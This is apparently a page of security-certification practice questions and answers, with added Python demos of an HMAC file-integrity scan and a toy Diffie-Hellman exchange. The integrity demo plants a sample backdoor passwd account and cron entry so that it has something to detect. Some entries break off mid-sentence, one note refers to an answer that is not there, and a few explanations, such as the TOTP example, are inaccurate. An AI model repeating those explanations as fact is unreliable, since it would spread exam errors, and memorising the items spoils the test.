Clustering Clustering enables a technician to use two or more servers together. In a failover cluster, a failure on the working server will cause that server to be disabled, but the next server in the cluster will then become active, so most single points of failure can be overcome. Virtualization of a server creates an entirely new server in a virtual machine, but it will have the same possibility of a single point of failure as a physical server. RAID (Redundant Array of Inexpensive Disks) reduces the chances of a server's single point of failure by allowing for fault-tolerant disks—but only for disks, and only certain kinds of RAID. If any other points on the server fail, RAID will not be able to recover. A cold site does not have servers ready to go if there is a single point of failure on a particular server. Hot sites could usually recover from these types of issues, but the users might have to physically go to the building, depending on the configuration.

Your organization must achieve compliance for PCI and SOX. Which of the following would best allow the organization to achieve compliance and ensure security? (Select the three best answers.)

Compartmentalize the network Apply technical controls to meet compliance regulations Establish a list of devices that must meet regulations Of the listed options, the best ones for achieving compliance with PCI DSS (Payment Card Industry Data Security Standard) and SOX (Sarbanes-Oxley) are the following. Compartmentalize the network: divide the network with VLANs, subnetting, DMZs, or whatever security boundary is necessary to protect servers and clients that handle sensitive data. Apply technical controls to meet compliance regulations: for example, vulnerability management, monitoring, protecting data, and so on. Establish a list of devices that must meet regulations: any devices and computers through which payment information, health information, or PII of any kind flows should be analyzed, secured, and continually monitored. PCI DSS requirements can be summed up as the following:
Build and maintain a secure network
Protect cardholder data
Maintain a vulnerability management program
Implement strong access control measures
Regularly monitor and test systems and networks
Maintain an information security policy
Establishing a company framework is somewhat vague but could refer to creating an IT security framework. This is a very good idea, but it is more of a high-level plan for how to execute actual procedures and policies, not the procedures and policies themselves. Centralizing management of all devices might be a good idea from a management perspective, but for security, certain devices will no doubt need to be compartmentalized. Establishing a list of users who work with each regulation is a good idea, but not as important as the technical controls previously mentioned. Note: Remember to familiarize yourself with whatever policies and procedures your organization employs, whether they relate to PCI DSS, SOX, ISO, or other compliance and regulatory frameworks.

Your company has decided to implement a virtual private network (VPN), which will be used by remote employees to access internal network resources. Which two protocols could you use?

L2TP PPTP Point-to-Point Tunneling Protocol (PPTP) was created by Microsoft to work with the Point-to-Point Protocol (PPP) to create a virtual connection so that networks can use the Internet as their WAN link. This connectivity method creates a virtual private network (VPN). PPTP is known as a tunneling protocol because it encapsulates PPP frames (in GRE) between client and server. PPTP's security rests on MS-CHAPv2 and RC4-based MPPE, both of which are broken, so it should not be deployed today even though it remains a valid exam answer. Layer Two Tunneling Protocol (L2TP) is an enhancement of PPTP and can also be used to create a VPN. L2TP is a combination of PPTP and Cisco's Layer 2 Forwarding (L2F) tunneling protocol and operates at the Data Link layer (Layer 2) of the Open Systems Interconnection (OSI) model. L2TP uses User Datagram Protocol (UDP, port 1701) for sending packets as well as for maintaining the connection. L2TP provides no encryption of its own; Internet Protocol Security (IPSec) is used in conjunction with L2TP to encrypt the data. Answer B is incorrect. PPP is a protocol used to establish dial-up network connections. Answer C is incorrect. Remote Access Service (RAS) is a service provided by the network operating system that allows remote access to the network via a dial-up connection. Both PPTP and L2TP create a single point-to-point, client-to-server communication link. A VPN concentrator is a device used to terminate remote access VPNs; it is responsible for creating the tunnels between the endpoints.

You are investigating the authentication protocols used on your network. You discover that several authentication protocols are being used on your network. Which authentication protocol is the oldest?

LANman LAN Manager (LANMan) is the oldest authentication protocol listed. The LM hash uppercases the password, pads it to 14 characters, splits it into two 7-character halves, and uses each half as a DES key to encrypt a fixed string; the two results are concatenated. Because each half can be attacked independently and the character set is reduced to uppercase, the effective strength is that of a 7-character uppercase password, which makes LM hashes trivially susceptible to brute-force attacks. Answer A is incorrect. Kerberos is the preferred authentication protocol for Windows 2000 Server, Windows Server 2003, and Windows Server 2008. Early implementations used DES for encryption; modern implementations use AES. Answers D and C are incorrect. NT LAN Manager version 1 (NTLMv1) and NTLMv2 replaced LANMan and build on the MD4-based NT hash (NTLMv2 adds an HMAC-MD5 challenge-response). NTLM is backwards compatible with LANMan, which is why LM hash storage should be disabled wherever no legacy client still needs it.

An administrator configures Unix accounts to authenticate to a non-Unix server on the internal network. The configuration file incorporates the following information: DC=ServerName and DC=COM. Which service is being used?

LDAP DC=ServerName and DC=COM are domainComponent attributes of an LDAP distinguished name (for example DC=ServerName,DC=com), which is how a Microsoft Active Directory domain is named in the directory; the DC here means domain component, not domain controller, although in Active Directory the directory is served by domain controllers. Lightweight Directory Access Protocol (LDAP) is a directory access and authentication service used by Windows domain controllers, among other technologies. SAML (Security Assertion Markup Language) is used to address single sign-on (SSO) between an identity provider and a service provider; it is based on XML. RADIUS and TACACS+ are other types of authentication servers and are not necessarily Microsoft domain-based (in fact, TACACS+ is Cisco-based). Also, they are more often used for remote and network-device authentication, whereas the scenario implies a local directory-based authentication technology.

An employee of your organization was escorted off of the premises for suspicion of fraudulent activity, but the employee had been working for two hours before leaving. You have been asked to find out what files have changed since last night's integrity scan. Which protocols could you use to perform your task? (Select the two best answers.)

MD5 HMAC The key word in this question is integrity. When dealing with the integrity of files, we employ hashing. The only two hashing options among the supplied answers are MD5 and HMAC. Hash values computed now can be compared with last night's integrity scan to find out which files changed in the two hours the employee was working today. In practice, prefer a keyed HMAC with SHA-256 over plain MD5: MD5 is collision-broken, and an unkeyed hash lets anyone who can modify files also recompute the baseline, whereas an HMAC baseline can only be regenerated by someone holding the key. Elliptic curve cryptography (ECC), Advanced Encryption Standard (AES), Pretty Good Privacy (PGP), and Blowfish are all used to encrypt data; none of them is a cryptographic hash function.
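
An added example (not from the original) of the keyed integrity baseline the answer describes. It walks a directory tree, records an HMAC-SHA256 per file, and diffs a later scan against the baseline to report added, removed and changed files. The sample tree, its contents and the key are constructed for the demo; in production the key would live off the host so an intruder who changes files cannot also re-sign the baseline.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path
from typing import Dict, Set, Tuple

# Constructed demo key. Assumption: in production the key is kept off the host
# (or in an HSM/TPM) so an intruder who edits files cannot re-sign the baseline.
KEY = b"constructed-demo-key-do-not-use"


def file_hmac(path: Path, key: bytes) -> str:
    """Keyed digest of one file, streamed so large files need not fit in memory."""
    mac = hmac.new(key, digestmod=hashlib.sha256)
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            mac.update(chunk)
    return mac.hexdigest()


def hash_tree(root: Path, key: bytes) -> Dict[str, str]:
    """Baseline: relative POSIX path -> HMAC for every regular file under root."""
    return {p.relative_to(root).as_posix(): file_hmac(p, key)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_baselines(old: Dict[str, str], new: Dict[str, str]) -> Tuple[Set[str], Set[str], Set[str]]:
    """Return (added, removed, changed) relative paths between two scans."""
    added = set(new) - set(old)
    removed = set(old) - set(new)
    changed = {p for p in set(old) & set(new) if not hmac.compare_digest(old[p], new[p])}
    return added, removed, changed


def run_demo() -> Tuple[Set[str], Set[str], Set[str]]:
    """Constructed scenario: baseline a tiny tree ('last night'), make the kinds of
    changes an insider might, then re-scan and diff ('this morning')."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        etc = root / "etc"
        etc.mkdir()
        (etc / "passwd").write_bytes(b"root:x:0:0:root:/root:/bin/sh\n")
        (etc / "hosts").write_bytes(b"127.0.0.1 localhost\n")
        baseline = hash_tree(root, KEY)

        with (etc / "passwd").open("ab") as fh:  # modified: an extra UID-0 account
            fh.write(b"mallory:x:0:0:backdoor:/:/bin/sh\n")
        (etc / "cron.d").mkdir()
        (etc / "cron.d" / "backdoor").write_bytes(b"* * * * * root /tmp/.x\n")  # added
        (etc / "hosts").unlink()  # removed

        return diff_baselines(baseline, hash_tree(root, KEY))


if __name__ == "__main__":
    added, removed, changed = run_demo()
    print("added:  ", sorted(added))
    print("removed:", sorted(removed))
    print("changed:", sorted(changed))
```

Content hashes catch edits that preserve size and timestamps, which an attacker can reset; the baseline file itself must be stored where the suspect account could not write to it.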

Your organization is trying to decide whether to use RSA or ECC to encrypt cellular communications. What is an advantage of ECC over the RSA algorithm?

ECC requires fewer resources. The advantage of Elliptic Curve Cryptography (ECC) over the Rivest, Shamir, and Adleman (RSA) algorithm is that it is more efficient and requires fewer resources than RSA.ECC is a method used to implement public-key (asymmetric) cryptography. ECC serves as an alternative to the RSA algorithm and provides similar functionalities, but ECC has a higher strength per bit than RSA. ECC performs digital signature generation, secure key distribution, and encryption and decryption of data.Wireless devices, handheld computers, smart cards, and cellular telephones have limited processing power, storage, power, memory, and bandwidth compared to other systems. To ensure efficient use of resources, ECC provides encryption by using shorter key lengths. Shorter key lengths do not imply less secure systems. Therefore, ECC provides the same level of security as RSA by using a shorter key that enables easier processing by the resource-constrained devices. For example, a 224-bit ECC key provides the same level of security as the 2048-bit keys used by legacy schemes. A 3072-bit legacy key and a 256-bit ECC key provide equivalent security. This is an obvious advantage when the future lies in smaller devices and increased security.Also keep in mind that you need to understand ephemeral keys and perfect forward secrecy. An ephemeral key is used when a key is generated for each execution of a key establishment process. In some cases, ephemeral keys are used more than once within a single session when the sender generates only one ephemeral key pair per message and the private key is combined separately with each recipient's public key. Perfect forward secrecy (PFS) ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future. For PFS to exist, the key used to protect transmission of data must NOT be used to derive any additional keys. 
If the key used to protect data transmission was derived from some other keying material, that material must NOT be used to derive any more keys.
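
An added example (not code from the original page) that serves both the Diffie-Hellman/ECDHE key-negotiation answer earlier and the ephemeral-key discussion above: both sides of a finite-field Diffie-Hellman exchange in pure Python, with ephemeral exponents, validation of the peer's public value against small-subgroup attacks, and a KDF over the shared secret. The 128-bit safe prime it generates, the generator 4 and the KDF salt are assumptions chosen so the demo runs quickly; real deployments use the 2048-bit or larger groups of RFC 7919 or an elliptic curve. The exchange is unauthenticated, as Diffie-Hellman is on its own.

```python
import hashlib
import hmac
import secrets
from typing import Tuple

# Assumption: a 128-bit safe prime keeps the demo fast. Never use parameters this
# small in practice; use RFC 7919 groups or ECDHE on a named curve instead.
TOY_BITS = 128

SMALL_PRIMES = [n for n in range(3, 200, 2)
                if all(n % d for d in range(3, int(n ** 0.5) + 1, 2))]


def is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Trial division by small primes, then Miller-Rabin with random bases."""
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0:
        return False
    for sp in SMALL_PRIMES:
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def find_safe_prime(bits: int) -> int:
    """First safe prime p = 2q + 1 (q also prime) at or above 2**(bits-1)."""
    q = (1 << (bits - 2)) + 1
    while True:
        if is_probable_prime(q) and is_probable_prime(2 * q + 1):
            return 2 * q + 1
        q += 2


def validate_public_value(y: int, p: int, q: int) -> None:
    """Reject out-of-range and small-subgroup values before using a peer's share."""
    if not 2 <= y <= p - 2:
        raise ValueError("public value out of range")
    if pow(y, q, p) != 1:
        raise ValueError("public value is not in the order-q subgroup")


class Party:
    """One side of the exchange. The private exponent is ephemeral: generated for
    this session and forgotten afterwards, which is what gives forward secrecy."""

    def __init__(self, p: int, g: int) -> None:
        self.p, self.g, self.q = p, g, (p - 1) // 2
        self._x = secrets.randbelow(self.q - 2) + 2   # ephemeral private exponent
        self.public = pow(g, self._x, p)             # the only value sent on the wire

    def derive_key(self, peer_public: int) -> bytes:
        validate_public_value(peer_public, self.p, self.q)
        z = pow(peer_public, self._x, self.p)
        z_bytes = z.to_bytes((self.p.bit_length() + 7) // 8, "big")
        # Never use the raw shared secret as a key: run it through a KDF
        # (HKDF-Extract shape: HMAC over Z keyed with a fixed public salt).
        return hmac.new(b"dh-demo-kdf-salt", z_bytes, hashlib.sha256).digest()


P = find_safe_prime(TOY_BITS)
G = 4  # 4 = 2**2 is a quadratic residue, so it generates the order-q subgroup of any safe prime


def run_exchange(p: int = P, g: int = G) -> Tuple[bytes, bytes]:
    """Both sides of one session: exchange public values, derive the key independently."""
    alice, bob = Party(p, g), Party(p, g)
    # Wire: alice -> bob: alice.public ; bob -> alice: bob.public
    return alice.derive_key(bob.public), bob.derive_key(alice.public)


if __name__ == "__main__":
    k_alice, k_bob = run_exchange()
    print("keys match:", k_alice == k_bob)
    print("next session differs:", run_exchange()[0] != k_alice)
```

Because each session draws new exponents and discards them, a later compromise of either host yields nothing that decrypts earlier traffic; the public-value check is the step most toy implementations omit, and skipping it lets a peer force the shared secret into a tiny subgroup.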

After a recent security audit, several security issues were found. The auditor made suggestions on technologies that your organization should deploy. One of the suggestions made is to deploy SKIP. Which statement is true of SKIP?

SKIP is a key distribution protocol. Simple Key management protocol for Internet Protocols (SKIP) is a key management and distribution protocol used for secure IP communication, such as Internet Protocol Security (IPSec). SKIP uses hybrid encryption to convey session keys. These session keys are used to encrypt data in IP packets. SKIP uses a key exchange algorithm, such as the Diffie-Hellman algorithm, to generate a key-encrypting key that will be used between two parties. A session key is used with a symmetric algorithm to encrypt data. SKIP is not a key storage protocol. It is a key distribution and management protocol similar to Internet Key Exchange (IKE).SKIP works on a session-by-session basis, although it does not require prior communication for the establishment of sessions. SKIP employs encryption standards, such as Data Encryption Standard (DES) and Triple DES (3DES), to provide secure communication.SKIP does not deploy IKE for key distribution and management. IKE is a separate framework used to securely exchange keys to establish an IPSec session.Key exchange can occur either in band or out of band. In-band key exchange occurs over the same transmission media that is used by data and voice transmissions. Out-of-band exchange occurs outside the data and voice transmission media. In-band key exchange is less secure than out-of-band key exchange.

The IT director recommends that you require your service provider to give you an end-to-end traffic performance guarantee. What document will include this guarantee?

SLA An SLA, service-level agreement, is the part of a service contract in which the level of service is formally defined. This might include traffic performance guarantees, restoration guarantees, and minimum downtime guarantees. A chain of custody is the chronological documentation of evidence. DRP stands for disaster recovery plan, which includes contact information, determination of impact, a recovery plan, and so on. Incident response procedures are sets of procedures that an investigator will use when examining a computer security incident. They might include preparation, identification, containment, eradication, recovery, and lessons learned.

CAM table

The Content Addressable Memory table, a table that is in a switch's memory that contains ports and their corresponding MAC addresses.

You have been tasked by your boss with calculating the annualized loss expectancy (ALE) for a $5000 server that crashes often. In the past year, the server crashed 10 times, requiring a reboot each time, which resulted in a 10% loss of functionality. What is the ALE of the server?

$5000 If the server had a 10% loss of functionality, that is $500, or 1/10th of the server's value. If this happened 10 times per year, multiply that individual loss of $500 by 10, giving a $5000 loss for the year. Remember that the ALE is the total expected loss in dollars per year for a specific incident. The full quantitative risk assessment equation is SLE × ARO = ALE, where the single loss expectancy (SLE) is the asset value multiplied by the exposure factor (EF): $5000 × 10% = $500. The annualized rate of occurrence (ARO) is the number of times per year the incident occurs, in this case 10. So $500 × 10 = $5000. The ALE of $5000 happens to equal the value of the server. Time for a replacement? At the very least, some investigative work is needed to find out why the server goes down so often. The other answers of $500, $10,000, and $50,000 are not correct because they do not fit the equation SLE × ARO = ALE. Math doesn't lie.

What port and transport mechanism does TFTP use by default?

69 and UDP TFTP, the Trivial File Transfer Protocol, uses port 69 by default, and utilizes the UDP (User Datagram Protocol) connectionless transport mechanism. This makes for a simple, lightweight protocol used to automate the transfer of basic files such as boot files in a localized environment. For example, if a PXE-compliant client computer boots off of the network, it might make use of an embedded TFTP program within the network card to transfer the appropriate boot files from a server located somewhere on the local area network. TFTP is inherently insecure, so it is not recommended for use on the Internet. Port 68 is used by the Dynamic Host Configuration Protocol (DHCP) (client side) and the client side of the Bootstrap Protocol (BOOTP). TCP is the Transmission Control Protocol, which offers a guaranteed, connection-oriented transport mechanism, in contrast to UDP. TCP is not used by TFTP via port 69 or DHCP via port 68 (or port 67 for that matter).

A Web server is located on a DMZ segment. The Web server only serves HTTP pages, and there are no other computers on the DMZ segment. You need to configure the DMZ to ensure that communication can occur. Which port should be opened on the Internet side of the DMZ firewall?

80 Only port 80 should be opened on the Internet side of the demilitarized zone (DMZ) firewall. The firewall will allow only HTTP traffic to enter the DMZ; all other port traffic will be prevented from entering the DMZ. Answers A, B, and C are incorrect. Port 20 is used by File Transfer Protocol (FTP) to send data. Port 110 is used by Post Office Protocol (POP), and port 443 is used by Secure Sockets Layer (SSL). The Web server on the DMZ only serves Web pages, so only HTTP services should be activated on the Web server. All other services on the Web server should be deactivated, which will strengthen security on the Web server. Access control lists (ACLs) are used to configure rules on network devices. These ACLs determine which communication is allowed or denied. ACLs can be based on port numbers, IP addresses, MAC addresses, and other criteria.

Your organization has several conference rooms with wired RJ45 jacks that are used by employees and guests. The employees need to access internal organizational resources, but the guests only need to access the Internet. Which of the following should you implement?

802.1X and VLANs In this question the RJ45 wired jacks are the key. You don't want just anyone connecting to the wired jacks and having access to internal resources. So, implementing 802.1X and VLANs is an excellent solution. This will authenticate computers; only systems with the proper 802.1X adapter will be authenticated to internal resources. Other computers that connect will only be able to connect to the Internet. The virtual LAN can be port-based, with a VLAN per conference room, or perhaps protocol-based, defining which computers are allowed access to internal resources and which are allowed access to the Internet only. A virtual private network (VPN) is used so that remote users can gain access to the network. The scenario speaks only to localized conference rooms and resources, so a VPN (and the supporting IPsec used in L2TP connections) is not necessary. The organization will most likely have at least one switch and firewall already. However, the switch can be used as the authenticator of the 802.1X system. NAT (network address translation) is used in IPv4 networks to mask internal IP addresses when they access the Internet. This will most likely already be implemented by default, so any guests accessing the Internet will enjoy the security benefits of NAT. However, a demilitarized zone (DMZ) has little to do with the scenario; this is when servers (such as WWW and FTP) are placed in an area outside the LAN but still within the organization's network, making it easier for people on the Internet to access them.

You have been instructed to install an intrusion detection system that can protect a database server and the rest of the network. You cannot afford to use any more resources on the database server. You decide to implement a network intrusion detection system. Why is this superior to a host-based intrusion detection system?

A HIDS can negatively impact system performance. Usually, a HIDS cannot detect network attacks. A HIDS usually cannot detect network attacks, whereas a NIDS can. A HIDS will definitely have a negative impact on system performance because it uses resources in the form of CPU and RAM; however, a HIDS is reliable when it comes to detecting attacks on an individual computer. Also, a HIDS can be update

Which of the following is embedded and contains a storage root key?

A TPM (trusted platform module) is a dedicated chip residing on the motherboard that stores encrypted keys. One of these is the storage root key. This is used to encrypt the contents of the entire hard drive and is used by programs such as BitLocker for full disk encryption. An HSM (hardware security module) is a separate physical device that manages digital keys. It is not embedded in the system, but is external to the computer. EFS (Encrypting File System) is Microsoft's system for encrypting individual files in Windows, at which point their filenames turn green when viewed in Windows Explorer or File Explorer. BitLocker is Microsoft's full disk encryption program in Windows, which can make use of a TPM.

You are the security administrator for an organization. Management decides that all communications on the network should be encrypted using the data encryption standard (DES) or Triple DES (3DES) algorithm. Which statement is true of these algorithms?

A Triple DES (3DES) algorithm uses 48 rounds of computation. A Triple DES (3DES) algorithm uses 48 rounds of computation. It offers high resistance to differential cryptanalysis because it uses so many rounds. The encryption and decryption process performed by 3DES takes longer due to the higher processing power required. The actual key size of the Data Encryption Standard (DES) is 64 bits. A key size of 8 bits is used for a parity check. Therefore, the effective key size of DES is 56 bits. The DES algorithm uses 16 rounds of computation. The order and the type of computations performed depend upon the value supplied to the algorithm through the cipher blocks. According to the following calculation, a 56-bit DES encryption is 65,536 times more secure than a 40-bit DES encryption: 2^40 = 1099511627776 and 2^56 = 72057594037927936. Therefore, 72057594037927936 divided by 1099511627776 = 65,536. DES has many security issues. If a bank has a fleet of aging payment terminals used by merchants for transactional processing, and the terminals currently support single DES but require an upgrade to be compliant with security standards, the simplest solution to improve the in-transit protection of transactional data is to upgrade to 3DES.

During a forensic investigation, you are asked to make a copy of the contents of a hard drive. You need to ensure that this evidence can be used in court if needed. Which statement is true of disk imaging in this investigation?

A bit-level copy of the disk assists in the forensic investigation. A bit-level copy of the original disk proves helpful in the forensic investigation. A bit-level copy of a hard disk refers to making a copy at the sector level to cover every part of the area that can store user data, such as slack space and free space. When creating a copy of the original disk, you should also perform a forensic hashing of the disk contents, both before and after the copy is made. In addition, a forensic hashing of the image itself should be performed. By doing so, you can ensure that the image remains intact by comparing the hash values that are generated. A byte-level copy of the hard disk is not preferred for forensic analysis after an incident has occurred. A byte-level copy initiates the forensic imaging of the attacked workstation. To ensure the integrity of the evidence, the forensic investigation is not performed on the actual system. The system is taken offline by disconnecting it from the network, dumping the contents of the memory, and powering down the system. A backup copy of the system is taken, and this backup copy is used for investigation purposes. The output from the forensic imaging software should be directed towards a small computer system interface (SCSI) drive or some other media that is external to the system being investigated. This is done to initiate the forensic imaging of the attacked workstation. Changes made to the system, such as changing the file timestamps and modifying the files, can destroy the evidence. Therefore, skilled personnel should perform the forensic investigation to ensure that the evidence is unharmed and uncorrupted.

The new anti-virus application that your company purchased claims that it protects against all types of viruses, including multipart viruses. Which statement correctly defines this type of virus?

A multipart virus can infect executable files and boot sectors of hard disk drives. A multipart virus can infect both executable files and boot sectors of hard disk drives. The multipart virus resides in the memory and then infects boot sectors and executable files of the computer system. Answer B is incorrect. Macro viruses are programs written in Word Basic, Visual Basic, and VBScript. Macro viruses pose a major threat because the simplicity of the underlying language makes them easy to develop. They are platform independent and typically infect systems through Microsoft Office products. Answer A is incorrect. A stealth virus hides the changes it makes to system files and boot records, making it difficult to detect its presence. A stealth virus maintains a copy of a file before infecting it and presents the original copy to the monitoring software so that no changes are detected by the system. Answer D is incorrect. A self-garbling virus can hide itself from antivirus software by distorting its own code. When a self-garbling virus spreads, it jumbles and garbles its own code to prevent the antivirus software from detecting its presence. A small part of the virus code later decodes the jumbled part to obtain and subsequently execute the rest of the virus code. The ability of the self-garbling virus to format its own code makes it difficult for an antivirus to detect its presence. At some point during the patch application process, a file may become infected with a virus. When this is discovered, you will need to recover the file by replacing the exi

STP

A networking protocol that automatically creates a loop-free topology of Ethernet switches. Prevents looping that can occur when connecting both ends of a patch cable to ports on one switch.

nonce

A random number issued by an authentication protocol that can only be used once.

Which of the following is a disadvantage of PGP?

A recipient must trust a public key that is received.

You have a mobile sales force that must regularly access customer records from remote sites. You are concerned about security in the event a laptop or tablet is stolen. You want to implement measures that would not only include user authentication via username and password, but also evaluate other factors, such as time of day and location. What should you implement?

ABAC Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. It would also control behavior based on location, such as if a user has read access to files, but is attempting to edit or delete files remotely. Answer D is incorrect. Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is within range of the proximity card, and the information transmitted is correct, authentication is granted. Answer A is incorrect. Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once the card is stolen, the thief can use it in the same manner as the rightful owner. For example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Answer B is incorrect. False acceptance rate (FAR) is one way to measure the accuracy of a biometric authentication system. It measures how likely it would be that an unauthorized user is granted access to the system. Expressed as a ratio, it is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. A false acceptance can occur, for example, when an unauthorized individual with a dirty finger uses a fingerprint reader, and is allowed access to the system. This could happen because the system was not precise enough when matching the authorized user. By contrast, false rejection rate (FRR) measures how likely it would be that an authorized user is denied access to the system. It is also expressed as a ratio, calculated as the number of authorized users who were denied access to the protected system divided by the number of authentication attempts.
False rejections can occur if the system settings are too precise, or if users are not trained properly on biometric login procedures. Other considerations include CER, tokens, HOTP, TOTP, CAC, PIV, and file system security. Crossover error rate (CER) is the point where FAR and FRR are equal. Generally, a lower CER value would indicate a more accurate system. CER is primarily used to compare biometric authentication systems. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. HOTP and TOTP are two types of one-time passwords, i.e., they can only be used once. Hashed One Time Passwords (HOTP) are secure passwords used with hardware tokens. Time-based One Time Passwords (TOTP) are issued for a specific period of time. Once it is used or its time expires, the TOTP is no longer valid. As an example of a TOTP, a user forgets a password to a website. When the user clicks the "Forgot Password" link, the website would send a new temporary password to the user, but would limit how long the temporary password would be valid. A Common Access Card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. A Personal Identity Verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.

What needs to be configured to offer remote access to a network?

ACLs Access control lists (ACLs) need to be configured properly for users to gain remote access through a firewall/router and proceed to the main network. Tokens are used in authentication schemes (often local) but are usually generated with little configuration. Biometrics is the authentication of individuals through physical characteristics. Supplicants (authentication agents) are usually loaded on computers in an 802.1X NAC network, which is usually local and with little configuration.

Your employees are allowed to use personal fitness monitors and other wearable devices inside your facility. You are concerned about proprietary communication with these devices. Which of these technologies is the wireless communication with which you should be concerned?

ANT You should be concerned with ANT, which is a proprietary technology developed by Garmin. It is mostly used in wearable devices, like fitness sensors. It is a low-power wireless technology with a range of about 30 meters. ANT is susceptible to eavesdropping, interception, and impersonation. Answer A is incorrect. Near field communications (NFC) connects devices automatically when they are in range. NFC is often used with mobile payment systems on smartphones. Security issues arise if someone loses a phone, if the phone is stolen, or if the phone is compromised in some other way. One example would be if the user's swipe pattern is ascertained. NFC is an ISO/IEC standard, not a proprietary technology. Answer B is incorrect. Bluetooth devices are a long-standing security concern because they are susceptible to bluejacking (sending unsolicited messages) and bluesnarfing (extracting data from the device). A new attack called BlueBorne can download viruses and malware to Bluetooth-enabled devices. Bluetooth is a wireless standard from the Bluetooth Special Interest Group (SIG), not a proprietary technology. Answer C is incorrect. Infrared requires line-of-sight communication. While it is still used in some TV remote controls, it has largely been replaced by Bluetooth and WiFi. Infrared is a standard from ANSI and other organizations, not a proprietary technology. Other mobile device security concerns include DoS, WiFi, SATCOM, and USB. Cellular security solutions continue to improve, but DoS remains a vulnerability concern. WiFi has several security options. They include WEP, WPA, and WPA2. WEP has serious flaws, is easy to crack, and is not recommended. WPA2 is the most secure, and should always be your first choice. Satellite communication (SATCOM) over a satellite phone is insecure. An attacker can bypass your network and connect to a satellite. Data interception, injection attacks, and data manipulation are particular concerns.
USB, from a wireless standpoint, is incorporated into many portable devices with storage capability. Vulnerabilities include packet loss and data corruption.

Your company implements Kerberos 5 to provide authentication services. Which entity in this deployment authenticates users?

AS In Kerberos 5, Authentication Service (AS) Exchange authenticates users and provides users with a ticket-granting ticket (TGT). When a user wants to gain access to a network resource, that user's TGT is sent to a computer that provides Kerberos Ticket Granting Service (TGS) Exchange. A TGS server uses a TGT to create a session key for the client requesting service and the server providing service. A client requesting service sends a session key to a server, and Client-Server (CS) exchange is used to enable a client and a server to authenticate one another. After these processes are completed, a client can gain access to services on a server. AS, CS, and TGS are the three main protocols used on a Kerberos network to provide authentication and authorization for use of resources.

Which of the following refers to the amount of time that users will not be allowed to attempt to log in to the network after they have reached the threshold of account login failures?

Account lockout duration The account lockout duration is the amount of time that users will not be allowed to attempt to log in to the network after they have reached the threshold of account login failures. By default, this setting is 30 minutes on many security policies. The account lockout threshold is the number of times that the user is allowed to attempt to log in. The default on many policies is five attempts, but often organizations change this to three (known as the three-strikes-and-you're-out rule). Password complexity requirements can be enabled within a policy; if so, the users need to incorporate three of four methods of password complexity, including uppercase characters, numeric characters, special characters, and so on. Minimum password age is the number of days that a password must exist before a user is allowed to change it.

You have been tasked with blocking DNS requests and zone transfers coming from outside IP addresses. You analyze your organization's firewall and note that it implements an implicit allow and currently has the following ACL configured for the external interface:
permit TCP any any 80
permit TCP any any 443

Add the following ACL at the bottom of the current ACL: deny IP any any 53. Change the implicit rule to an implicit deny. First of all, a firewall should not be set with an implicit allow by default. That would allow just about any kind of traffic through the firewall. Plus, it would make the already configured ACL unnecessary. So, the firewall should be changed to an implicit deny for all connections. That is the default setting for firewalls and it disallows all traffic coming from the Internet through the inbound interface (unless otherwise stated with an ACL). Second, you would add the ACL deny IP any any 53 at the bottom of the current ACL. This will deny any DNS traffic (because DNS uses port 53) including DNS requests and zone transfers. It does this for any type of IP connection (including TCP and UDP) and for all IP addresses on the local and remote ends. Removing the current ACL would do nothing because the firewall is currently configured with an implicit allow. However, if you changed that default rule to an implicit deny and removed the ACL, Internet users would no longer be able to connect to the web server (which uses ports 80 and 443). That doesn't solve your problem; in fact, it creates another one. It doesn't really matter where you place the new ACL to block DNS requests—top, bottom, doesn't make a difference because when you are finished, the firewall will have an implicit deny, and then two separate ACLs that pretty much work independently of each other. However, you would normally place the ACLs in order, and this would mean placing the new ACL below the first. The key with the other two possible ACLs in the answers is that they are not blocking enough traffic. One shows TCP, which is not enough; you need to block TCP and UDP—this is done by simply stating IP. ICMP is not correct, because that deals with layer 3 testing, such as the ping utility.

You are incorporating a perimeter network into a network redesign and are adding several new devices to enhance security. Which of these would NOT be best placed in the new perimeter network?

Aggregation switches Aggregation switches are not best placed in a perimeter network because they are best used to connect other switches together. They can be placed anywhere they are needed. Aggregation switches create a single bandwidth stream from multiple sources. Answer D is incorrect. A DDoS mitigator should be placed in the perimeter network so that it can detect and mitigate a DDoS attack. Answer A is incorrect. Proxies are best suited for placement in the perimeter network. Answer B is incorrect. VPN concentrators should be placed in the perimeter network near the gateway. Other security devices and technologies that are sensitive to their placement include sensors, collectors, correlation engines, load balancers, VPN concentrators, SSL accelerators, taps, and SDN. Sensors, collectors, and correlation engines should be placed closest to the devices being monitored to improve performance. Load balancers are usually placed in the same networks as devices that receive a high load. VPN concentrators should be placed on the VPN perimeter. SSL accelerators should be placed close to or on the devices using SSL. Taps should be placed closest to the devices they are monitoring. SDN can be used anywhere, but the SDN controller should be centrally located to provide the best performance for all devices that communicate via the SDN. Sensors are a classification of security devices that collect information on a host or on the network. Based on the information received, they may produce an alert or react with a trigger. Collectors are a classification of security device that gather information from various sources. The information is then delivered to a correlation engine. Correlation engines examine logs from several firewalls, and aggregate the entries to determine 